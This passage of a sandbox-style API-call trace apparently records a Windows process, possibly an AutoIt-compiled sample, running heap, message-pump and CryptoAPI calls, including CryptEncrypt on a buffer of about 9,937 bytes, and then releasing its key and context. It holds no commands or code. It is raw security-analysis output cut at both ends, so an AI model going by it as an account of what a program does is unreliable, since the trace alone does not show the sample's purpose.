wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.124] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0190.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0190.124] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.124] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0190.124] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.125] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.125] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0190.125] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0190.125] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.125] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c27f8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27f8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0190.125] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.125] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.125] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.126] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.126] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.126] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.126] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.126] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.126] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0190.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0190.126] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.126] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0190.126] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0190.126] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.126] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.126] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0190.126] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.126] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0190.127] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0190.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.127] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0190.127] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.127] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.127] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x26c2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x26d0) returned 1 [0190.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0190.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.127] CharLowerBuffW (in: lpsz="byte[9937]", cchLength=0xa | out: lpsz="byte[9937]") returned 0xa [0190.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.128] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.128] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0190.128] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.128] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.128] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbec6e8*, pdwDataLen=0x87e820*=0x26c2, dwBufLen=0x26d0 | out: pbData=0xbec6e8*, pdwDataLen=0x87e820*=0x26d0) returned 1 [0190.128] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.128] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0190.128] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.128] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.128] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.128] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.128] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0190.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.128] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.128] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.129] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.129] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0190.129] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.129] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0190.129] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0190.129] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.129] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0190.129] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.129] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.129] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.129] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.131] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.131] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.131] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0190.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0190.131] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.131] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0190.131] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0190.131] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.131] CryptDestroyKey (hKey=0x90aed8) returned 1 [0190.131] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.131] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.131] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0190.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.131] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.131] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.131] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0190.131] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0190.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0190.131] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.132] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0190.132] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0190.132] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0190.132] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.132] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.132] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.132] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.132] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0190.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0190.132] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.132] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0190.132] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.132] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0190.132] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.132] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.132] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0190.133] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.133] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.133] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0190.133] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0190.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.133] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0190.133] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.133] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0190.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0190.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0190.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd798 [0190.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0190.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0190.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0190.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0190.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0190.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0190.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0190.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0190.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0190.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0190.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0190.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.134] RtlAllocateHeap 